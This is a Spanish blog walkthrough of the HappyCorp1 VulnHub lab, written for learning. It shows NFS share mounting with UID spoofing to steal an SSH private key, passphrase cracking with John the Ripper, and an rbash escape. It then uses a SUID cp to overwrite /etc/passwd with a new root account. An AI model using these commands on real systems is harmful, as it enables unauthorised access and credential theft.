jejo.es (Em50L)

En menos de 50 líneas.

Happycorp1

Publicado:
#aprendizaje#vulnhub
#hardening#pentesting

resumen en portada

Nota: para reparar la red de la maquina:
entro en la maquina y reconfiguro la red
https://www.shellhacks.com/how-to-grant-root-access-user-root-privileges-linux/

1) Enumeración



  • Escaneo la red:
    ip a |grep global
    nmap -sn 192.168.56.1/24 -T3
    jejo@em50l:~$ ip a |grep global
    inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0

jejo@em50l:~$ nmap -sn 192.168.56.1/24 -T3

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:16 CET

Nmap scan report for 192.168.56.101
Host is up (0.0017s latency).



  • Escaneo la ip de la maquina a pentestear:
    nmap -nT3 192.168.56.101
    jejo@em50l:~$ nmap -nT3 192.168.56.101 

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:32 CET
Nmap scan report for 192.168.56.101
Host is up (0.0030s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
2049/tcp open  nfs



  • escaneo http nmap -n 192.168.56.101 -p 80 -script *http*
    jejo@em50l:~$ nmap -n 192.168.56.101 -p 80 -script *http*

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:41 CET
Nmap scan report for 192.168.56.101
Host is up (0.00041s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /admin.php: Possible admin folder
|   /robots.txt: Robots file
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.25'
|   /img/: Potentially interesting directory w/ listing on 'apache/2.4.25'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.25'
|   /lib/: Potentially interesting directory w/ listing on 'apache/2.4.25'
|_  /manual/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds



  • echemosle un ojo a la web (http):
    . happycorp1.jpg



  • echemosle un ojo al nfs:
    root@kali:~# showmount -e 192.168.56.101
Export list for 192.168.56.101:
/home/karl *

    root@kali:~# mkdir /mnt/nfs
root@kali:~# sudo mount -t nfs 192.168.56.101:/home/karl /mnt/nfs
root@kali:~# ls -lha /mnt/nfs/
total 28K
drwxr-xr-x 3 1001 1001 4.0K Mar  5  2019 .
drwxr-xr-x 3 root root 4.0K Oct 30 17:36 ..
lrwxrwxrwx 1 root root    9 Mar  5  2019 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001  220 Mar  4  2019 .bash_logout
-rw-r--r-- 1 1001 1001 3.5K Mar  5  2019 .bashrc
-rw------- 1 1001 1001   28 Mar  4  2019 .lesshst
-rw-r--r-- 1 1001 1001  675 Mar  4  2019 .profile
drwx------ 2 1001 1001 4.0K Mar  5  2019 .ssh

https://www.cyberciti.biz/faq/howto-see-shares-on-nfs-server-exported-filesystems/



  • Parece que la carpeta .ssh puede tener algo interesante.
    Veamos que contiene: 
    root@kali:~# ls -lha /mnt/nfs/.ssh/
ls: cannot open directory '/mnt/nfs/.ssh/': Permission denied

Permiso denegado (siendo root)????
Tendre que crear un usuario con el id 1001:
useradd --uid 1001 aux_user

    root@kali:~# useradd --uid 1001 aux_user
root@kali:~# ls -lha /mnt/nfs/
total 28K
drwxr-xr-x 3 aux_user aux_user 4.0K Mar  5  2019 .
drwxr-xr-x 3 root     root     4.0K Oct 30 17:36 ..
lrwxrwxrwx 1 root     root        9 Mar  5  2019 .bash_history -> /dev/null
-rw-r--r-- 1 aux_user aux_user  220 Mar  4  2019 .bash_logout
-rw-r--r-- 1 aux_user aux_user 3.5K Mar  5  2019 .bashrc
-rw------- 1 aux_user aux_user   28 Mar  4  2019 .lesshst
-rw-r--r-- 1 aux_user aux_user  675 Mar  4  2019 .profile
drwx------ 2 aux_user aux_user 4.0K Mar  5  2019 .ssh

Ahora con los permisos del usuario 1001 ya deberia poder ver el contenido de .ssh Lo imaginado unos archivos(certificados) de acceso

    root@kali:~# su aux_user 
$ ls -lha /mnt/nfs/.ssh
total 24K
drwx------ 2 aux_user aux_user 4.0K Mar  5  2019 .
drwxr-xr-x 3 aux_user aux_user 4.0K Mar  5  2019 ..
-rw-r--r-- 1 aux_user aux_user  740 Mar  4  2019 authorized_keys
-rw------- 1 aux_user aux_user 3.3K Mar  4  2019 id_rsa
-rw-r--r-- 1 aux_user aux_user  740 Mar  4  2019 id_rsa.pub
-rw-r--r-- 1 aux_user aux_user   18 Mar  4  2019 user.txt

    root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/user.txt"
flag1{Z29vZGJveQ}

Conseguido Primer Flag flag1{Z29vZGJveQ}

    root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/authorized_keys"
ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp

ok el usuario es karl

    root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/id_rsa.pub"
ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp

Y tenemos la llave privada. id_rsa



Veamos si nos deja entrar via ssh usando el certificado encontrado. ssh karl@192.168.56.101 -i /mnt/nfs/.ssh/id_rsa

$ ssh karl@192.168.56.101 -i /mnt/nfs/.ssh/id_rsa
Could not create directory '/home/aux_user/.ssh'.
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:uXiM0zLVXRQYHkhNxuTByBPb14pH1AJn6IpACByicCY.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/aux_user/.ssh/known_hosts).
Enter passphrase for key '/mnt/nfs/.ssh/id_rsa':

Ups Problema… necesitare averiguar la contraseña del certificado (archivo llave)….

Buscando un poco RSA PRIVATE KEY lost pass phrase`encuentro:
Encuentro: https://askubuntu.com/questions/346114/how-to-retrieve-passphrase-for-private-key

Segunda Busqueda: john rip RSA PRIVATE KEY
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c

Leyendo veo que Falta el comando ssh2john (Lo busco con locate *2john)

Preparativos

root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/id_rsa" > id_rsa.crack
root@kali:~# wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/id_rsa" > id_rsa.crack
root@kali:~# python ./ssh2john.py id_rsa.crack > id_rsa.crack.txt

> Notas/Consultas utiles: `john --help` / `locate *rockyou*` / `locate john` 
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.crack.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/32])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep            (id_rsa.crack)
1g 0:00:00:25 DONE (2019-11-19 17:12) 0.03897g/s 558912p/s 558912c/s 558912C/s *7¡Vamos!
Session completed
Parece que la contraseña es **`sheep`** ___________

## Probemos conexion ssh 
root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack
Enter passphrase for key 'id_rsa.crack': sheep
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 30 18:36:40 2019 from 192.168.56.105
rbash: warning: shell level (1000) too high, resetting to 1
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$

Ups parece que hay un problema: el shell no funciona bien.


Pruebo con un shell alternativo: ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/sh

root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/sh
Enter passphrase for key 'id_rsa.crack': 
$ 
$ whoami
karl
$



Escalada de privilegios: Enumeracion


  • Enumeracion (desde shell): Version sistema operativo y Kernel
    • uname -a / cat /etc/*release 
      $ uname -a
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
$ cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
    • Busqueda exploits para sis operativo y nucleo: searchsploit Debian 4.9 
      root@kali:~# searchsploit Debian 4.9
Exploits: No Result
Shellcodes: No Result
      Sin Resultado.

Otra forma: auto_searchsploit.py

root@kali:~# https://raw.githubusercontent.com/ngalongc/AutoLocalPrivilegeEscalation/master/auto_priv_exploit.sh
root@kali:~# bash auto_priv_exploit.sh 4.9
[*] Possible Exploit

No possible exploit. Please use another version.

root@kali:~# python auto_searchsploit.py 4.9
[-] No potential exploit found. Aborting...


  • Enumeracion: LinEnum.sh
      Descargo Lienum o Copio archivo a la maquina destino 
      root@kali:~# scp -i id_rsa.crack ./LinEnum.sh karl@192.168.56.101:/tmp
Enter passphrase for key 'id_rsa.crack': 
LinEnum.sh                           100%   45KB   4.0MB/s   00:00


      Demasiada informacion (la voy a filtrar un poco)
      -e [+] It looks like we have password hashes in /etc/passwd!
toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash

-e [-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

-e ### INTERESTING FILES ####################################
-e [-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc

-e [-] Installed compilers:
ii  gcc                           4:6.3.0-4                      amd64        GNU C compiler
ii  gcc-6                         6.3.0-18+deb9u1                amd64        GNU C compiler

-e [+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 130504 Feb 22  2017 /bin/cp
-e

!!!comando cp con privilegios root!!!

Veamos si es explotable:
https://gtfobins.github.io/gtfobins/cp/


  • Enumeracion: LinuxSmartEnumeration lse.sh
      Aunque ya hemos enumeravo voy a dejar esta opcion
      root@kali:~# wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh"
root@kali:~# scp -i id_rsa.crack ./lse.sh  karl@192.168.56.101:/tmp
Enter passphrase for key 'id_rsa.crack': 
lse.sh                                   100%   31KB   1.6MB/s   00:00    

      root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/bash /tmp/lse.sh 
Enter passphrase for key 'id_rsa.crack': 
---

        User: karl
     User ID: 1001
    Password: none
        Home: /home/karl
        Path: /usr/local/bin:/usr/bin:/bin:/usr/games
       umask: 0022

    Hostname: happycorp
       Linux: 4.9.0-8-amd64
Distribution: Debian GNU/Linux 9.8 (stretch)
Architecture: x86_64

==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in an administrative groups?.............. nope
[*] usr030 Other users with shell.......................................... yes!
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip
[i] usr060 Other users..................................................... skip
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[*] sud040 Can we read /etc/sudoers?....................................... nope
[*] sud050 Do we know if any other users used sudo?........................ nope
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/bin/cp
---
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... nope
[*] fst090 SSH files in home directories................................... yes!
[*] fst100 Useful binaries................................................. yes!
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'karl' have mail?.......................................... nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[!] fst160 Can we write to critical files?................................. nope
[i] fst500 Files owned by user 'karl'...................................... skip
[i] fst510 SSH files anywhere.............................................. skip
[i] fst520 Check hosts.equiv file and its contents......................... skip
[i] fst530 List NFS server shares.......................................... skip
[i] fst540 Dump fstab file................................................. skip
=================================================================( system )=====
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip
[!] sys020 Does the /etc/passwd have hashes?............................... yes!
---
toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash
---
[!] sys030 Can we read /etc/shadow file?................................... nope
[!] sys030 Can we read /etc/shadow- file?.................................. nope
[!] sys030 Can we read /etc/shadow~ file?.................................. nope
[!] sys030 Can we read /etc/master.passwd file?............................ nope
[*] sys040 Check for other superuser accounts.............................. yes!
[*] sys050 Can root user log in via SSH?................................... nope
[i] sys060 List available shells........................................... skip
[i] sys070 System umask in /etc/login.defs................................. skip
[i] sys080 System password policies in /etc/login.defs..................... skip
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... nope
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[!] ret050 Can we write to executable paths present in cron jobs........... nope
[*] ret060 Can we write to any paths present in cron jobs.................. nope
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====
[*] net000 Services listening only on localhost............................ nope
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip
[i] net520 ARP table....................................................... skip
[i] net530 Namerservers.................................................... skip
[i] net540 Systemd Nameservers............................................. skip
[i] net550 Listening TCP................................................... skip
[i] net560 Listening UDP................................................... skip
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. nope
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip
[i] srv410 Contents of /etc/xinetd.conf.................................... skip
[i] srv420 List /etc/xinetd.d if used...................................... skip
[i] srv430 List /etc/init.d/ permissions................................... skip
[i] srv440 List /etc/rc.d/init.d permissions............................... skip
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip
[i] srv460 List /etc/init/ permissions..................................... skip
[!] srv500 Can we write in systemd service files?.......................... nope
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip
==============================================================( processes )=====
[!] pro000 Can we write in any process binary?............................. nope
[*] pro010 Processes running with root permissions......................... yes!
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
[!] sof040 Found any .htpasswd files?...................................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip
[i] sof520 Postgres version................................................ skip
[i] sof530 Apache version.................................................. skip
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope

==================================( FINISHED )==================================
Connection to 192.168.56.101 closed.
      A destacar: 
      [!] fst020 Uncommon setuid binaries........................................ yes!
---
/bin/cp
---

!!!comando cp con privilegios root!!!

Veamos si es explotable:
https://gtfobins.github.io/gtfobins/cp/



Escalada de privilegios: Explotacion Vulnerabilidades encontradas.

https://gtfobins.github.io/gtfobins/cp/

La estrategia seria:

  • Generar una linea de password:
    basandome en como es la linea de root en /etc/password Genero una linea parecida con un password en lugar d `:x:` 
    root@kali:~# cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash
root@kali:~# openssl passwd -1 -salt jejo jejo
$1$jejo$4.S4N2nsF5I9dhmE1iqLD/
root@kali:~# echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash'
jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash

  • copiar el archivo /etc/password a una ruta temporal. (asi libero permisos)
    cp /etc/passwd /tmp/passwd

  • Añadir al archivo password la linea generada

    $ echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash' >> /tmp/passwd
/bin/sh: 13: cannot create /tmp/passwd: Permission denied
    Ups no me deja. pues añado la linea con nano y guardo como passwd2
  • Copiar el archivo password modificado a su ruta original
      $ cp /tmp/passwd2 /etc/passwd
$ tail -2 /etc/passwd
      
statd:x:107:65534::/var/lib/nfs:/bin/false
jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash


Conseguido ROOT

$ su jejo
Password: 
root@happycorp:/tmp# whoami
root


Aqui esta el Flag 
root@happycorp:~# cat /root/root.txt
Congrats!
flag2{aGFja2VyZ29k}
Here is some useless ascii art :)
           ,----------------,              ,---------,
        ,-----------------------,          ,"        ,"|
      ,"                      ,"|        ,"        ,"  |
     +-----------------------+  |      ,"        ,"    |
     |  .-----------------.  |  |     +---------+      |
     |  |                 |  |  |     | -==----'|      |
     |  |                 |  |  |     |         |      |
     |  |  Hacker God     |  |  |/----|`---=    |      |
     |  |  C:\>_          |  |  |   ,/|==== ooo |      ;
     |  |                 |  |  |  // |(((( [33]|    ,"
     |  `-----------------'  |," .;'| |((((     |  ,"
     +-----------------------+  ;;  | |         |,"
        /_)______________(_/  //'   | +---------+
   ___________________________/___  `,
  /  oooooooooooooooo  .o.  oooo /,   \,"-----------
 / ==ooooooooooooooo==.o.  ooo= //   ,`\--{)B     ,"
/_==__==========__==_ooo__ooo=_/'   /___________,"


 -Zayotic



Referencias

https://www.hackingarticles.in/happycorp1-vulnhub-walkthrough/

https://www.hackingarticles.in/beginners-guide-for-john-the-ripper-part-2/
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://gtfobins.github.io/gtfobins/cp/

A investigar:
https://www.shellhacks.com/linux-generate-password-hash/
https://www.hackplayers.com/2016/12/automatizando-el-escalado-de.html
https://github.com/ngalongc/AutoLocalPrivilegeEscalation